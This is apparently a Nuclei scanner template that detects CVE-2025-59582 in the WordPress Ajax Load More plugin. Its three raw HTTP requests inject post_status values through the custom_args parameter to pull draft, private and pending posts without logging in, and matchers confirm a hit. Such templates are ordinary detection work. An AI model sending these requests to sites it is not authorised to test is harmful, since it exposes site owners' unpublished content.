id: CVE-2025-59582

info:
  name: Ajax Load More < 7.6.1 - Unauthenticated Sensitive Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    The Ajax Load More – Infinite Scroll plugin for WordPress is vulnerable to  Sensitive Information Exposure in all versions up to, and including, 7.6.0.2. The plugin's AJAX endpoint (wp_ajax_nopriv_alm_get_posts) allows unauthenticated  users to access non-public posts (draft, private, pending, future, trash) by
    injecting post_status via the custom_args parameter, which bypasses the post_status authorization check in class-alm-queryargs.php.
  impact:
    Attackers can retrieve sensitive embedded system information, potentially aiding further attacks or data leaks.
  remediation:
    Update to the latest version beyond 7.6.0.2
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ajax-load-more/ajax-load-more-7602-unauthenticated-sensitive-information-exposure
  metadata:
    verified: true
    max-request: 3
    publicwww-query: "/wp-content/plugins/ajax-load-more/"
  tags: cve,cve2025,wordpress,wp-plugin,ajax-load-more,unauth

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=alm_get_posts&post_type=post&posts_per_page=5&custom_args=post_status:draft HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        X-Requested-With: XMLHttpRequest

      - |
        GET /wp-admin/admin-ajax.php?action=alm_get_posts&post_type=post&posts_per_page=5&custom_args=post_status:private HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        X-Requested-With: XMLHttpRequest

      - |
        GET /wp-admin/admin-ajax.php?action=alm_get_posts&post_type=post&posts_per_page=5&custom_args=post_status:pending HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        X-Requested-With: XMLHttpRequest

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"html\":") && contains(body_1, "\"totalposts\":")'
        condition: and

    extractors:
      - type: regex
        name: totalpost
        part: body
        internal: true
        group: 1
        regex:
          - '"totalposts":([0-9]+)'
# digest: 490a0046304402204aa476f3eb6f48527676ec3bc7e4f2b5c472e611fc8b9d5f8491e1d1ac527aa402204b9666554e2fc5cca10d1bf98e569bedfcb057a7b6f51db4edc4370f060f2648:922c64590222798bb761d5b6d8e72950